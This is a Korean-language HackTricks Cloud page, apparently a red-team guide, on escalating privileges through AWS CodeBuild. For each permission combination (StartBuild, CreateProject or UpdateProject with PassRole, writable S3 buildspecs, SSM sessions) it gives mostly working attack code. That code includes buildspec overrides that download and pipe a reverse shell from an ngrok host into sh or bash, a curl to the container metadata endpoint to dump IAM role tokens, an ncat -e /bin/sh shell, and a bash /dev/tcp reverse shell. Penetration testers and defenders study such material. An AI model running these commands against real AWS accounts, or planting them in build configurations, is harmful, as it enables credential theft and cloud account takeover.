AWS - Codebuild Privesc
Reading time: 9 minutes
tip
AWS 해킹 배우기 및 연습하기:
HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기:
HackTricks Training GCP Red Team Expert (GRTE)
Azure 해킹 배우기 및 연습하기:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks 지원하기
- 구독 계획 확인하기!
- **💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
- HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.
codebuild
자세한 정보는 다음을 참고하세요:
codebuild:StartBuild | codebuild:StartBuildBatch
이 권한들 중 하나만으로도 새로운 buildspec으로 빌드를 트리거하고 프로젝트에 할당된 iam role의 token을 탈취할 수 있습니다:
cat > /tmp/buildspec.yml <<EOF
version: 0.2
phases:
build:
commands:
- curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh
EOF
aws codebuild start-build --project <project-name> --buildspec-override file:///tmp/buildspec.yml
참고: 이 두 명령의 차이점은 다음과 같습니다:
StartBuild는 특정buildspec.yml을 사용하여 단일 build 작업을 트리거합니다.StartBuildBatch는 더 복잡한 구성(예: 여러 빌드를 병렬로 실행)을 포함한 빌드 배치를 시작할 수 있게 합니다.
잠재적 영향: 연결된 AWS Codebuild 역할로의 직접적인 privesc.
iam:PassRole, codebuild:CreateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)
iam:PassRole, codebuild:CreateProject, and codebuild:StartBuild or codebuild:StartBuildBatch 권한을 가진 공격자는 실행 중인 CodeBuild 프로젝트를 생성함으로써 escalate privileges to any codebuild IAM role 할 수 있습니다.
# Enumerate then env and get creds
REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"
JSON="{
\"name\": \"codebuild-demo-project\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"aws/codebuild/standard:1.0\",
\"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"
REV_PATH="/tmp/rev.json"
printf "$JSON" > $REV_PATH
# Create project
aws codebuild create-project --name codebuild-demo-project --cli-input-json file://$REV_PATH
# Build it
aws codebuild start-build --project-name codebuild-demo-project
# Wait 3-4 mins until it's executed
# Then you can access the logs in the console to find the AWS role token in the output
# Delete the project
aws codebuild delete-project --name codebuild-demo-project
잠재적 영향: Direct privesc to any AWS Codebuild role.
warning
Codebuild 컨테이너에서는 파일 /codebuild/output/tmp/env.sh에 메타데이터 자격 증명에 접근하는 데 필요한 모든 env vars가 포함되어 있다.
이 파일에는 **env variable
AWS_CONTAINER_CREDENTIALS_RELATIVE_URI**가 들어 있으며, 자격 증명에 접근하기 위한 URL path을 포함한다. 예시는/v2/credentials/2817702c-efcf-4485-9730-8e54303ec420와 같다.
해당 값을 **
http://169.254.170.2/**에 추가하면 role credentials를 덤프할 수 있다.
또한 **env variable
ECS_CONTAINER_METADATA_URI**가 포함되어 있어 컨테이너에 대한 메타데이터 정보를 얻기 위한 전체 URL을 제공한다.
iam:PassRole, codebuild:UpdateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)
이전 섹션과 마찬가지로, build project를 생성하는 대신 수정할 수 있다면, IAM Role을 지정하여 token을 탈취할 수 있다.
REV_PATH="/tmp/codebuild_pwn.json"
# Enumerate then env and get creds
REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | bash"
# You need to indicate the name of the project you want to modify
JSON="{
\"name\": \"<codebuild-demo-project>\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"aws/codebuild/standard:1.0\",
\"computeType\": \"BUILD_GENERAL1_SMALL\"
},
\"serviceRole\": \"arn:aws:iam::947247140022:role/codebuild-CI-Build-service-role-2\"
}"
printf "$JSON" > $REV_PATH
aws codebuild update-project --name codebuild-demo-project --cli-input-json file://$REV_PATH
aws codebuild start-build --project-name codebuild-demo-project
잠재적 영향: 모든 AWS Codebuild 역할에 대한 직접 privesc.
codebuild:UpdateProject, (codebuild:StartBuild | codebuild:StartBuildBatch)
이전 섹션과 유사하지만 iam:PassRole 권한 없이, 이 권한들을 악용하면 기존 Codebuild 프로젝트를 수정하고 이미 할당된 역할에 접근할 수 있습니다.
REV_PATH="/tmp/codebuild_pwn.json"
# Enumerate then env and get creds
REV="env\\\\n - curl http://169.254.170.2\$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
# Get rev shell
REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"
JSON="{
\"name\": \"<codebuild-demo-project>\",
\"source\": {
\"type\": \"NO_SOURCE\",
\"buildspec\": \"version: 0.2\\\\n\\\\nphases:\\\\n build:\\\\n commands:\\\\n - $REV\\\\n\"
},
\"artifacts\": {
\"type\": \"NO_ARTIFACTS\"
},
\"environment\": {
\"type\": \"LINUX_CONTAINER\",
\"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
\"computeType\": \"BUILD_GENERAL1_SMALL\",
\"imagePullCredentialsType\": \"CODEBUILD\"
}
}"
# Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild!
printf "$JSON" > $REV_PATH
aws codebuild update-project --cli-input-json file://$REV_PATH
aws codebuild start-build --project-name codebuild-demo-project
잠재적 영향: Direct privesc to attached AWS Codebuild roles.
SSM
ssm session을 시작할 수 있는 충분한 권한이 있으면, 빌드 중인 Codebuild project 내부로 들어갈 수 있습니다.
The codebuild project will need to have a breakpoint:
phases:
pre_build:
commands:
- echo Entered the pre_build phase...
- echo "Hello World" > /tmp/hello-world
- codebuild-breakpoint
그 다음:
aws codebuild batch-get-builds --ids <buildID> --region <region> --output json
aws ssm start-session --target <sessionTarget> --region <region>
자세한 정보는 check the docs.
(codebuild:StartBuild | codebuild:StartBuildBatch), s3:GetObject, s3:PutObject
특정 CodeBuild 프로젝트의 빌드를 시작/재시작할 수 있는 attacker가, 그 프로젝트가 buildspec.yml 파일을 공격자가 write access를 가진 S3 버킷에 저장해두고 있다면, CodeBuild 프로세스에서 명령 실행을 얻을 수 있습니다.
Note: 이 권한 상승은 CodeBuild worker가 attacker의 것과 다른 역할(가능하면 더 권한이 높은 역할)을 가질 때만 관련됩니다.
aws s3 cp s3://<build-configuration-files-bucket>/buildspec.yml ./
vim ./buildspec.yml
# Add the following lines in the "phases > pre_builds > commands" section
#
# - apt-get install nmap -y
# - ncat <IP> <PORT> -e /bin/sh
aws s3 cp ./buildspec.yml s3://<build-configuration-files-bucket>/buildspec.yml
aws codebuild start-build --project-name <project-name>
# Wait for the reverse shell :)
다음과 같은 buildspec을 사용하여 reverse shell을 얻을 수 있습니다:
version: 0.2
phases:
build:
commands:
- bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18419 0>&1
Impact: 일반적으로 높은 권한을 가진 AWS CodeBuild worker가 사용하는 역할에 대한 직접 privesc.
warning
buildspec은 zip 형식일 수 있으므로, 공격자는 루트 디렉토리에서 buildspec.yml을 다운로드해 압축을 풀고 수정한 뒤 다시 압축하여 업로드해야 합니다
자세한 내용은 here에서 확인할 수 있습니다.
Potential Impact: 첨부된 AWS Codebuild 역할에 대한 직접 privesc.
tip
AWS 해킹 배우기 및 연습하기:
HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기:
HackTricks Training GCP Red Team Expert (GRTE)
Azure 해킹 배우기 및 연습하기:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks 지원하기
- 구독 계획 확인하기!
- **💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
- HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.
HackTricks Cloud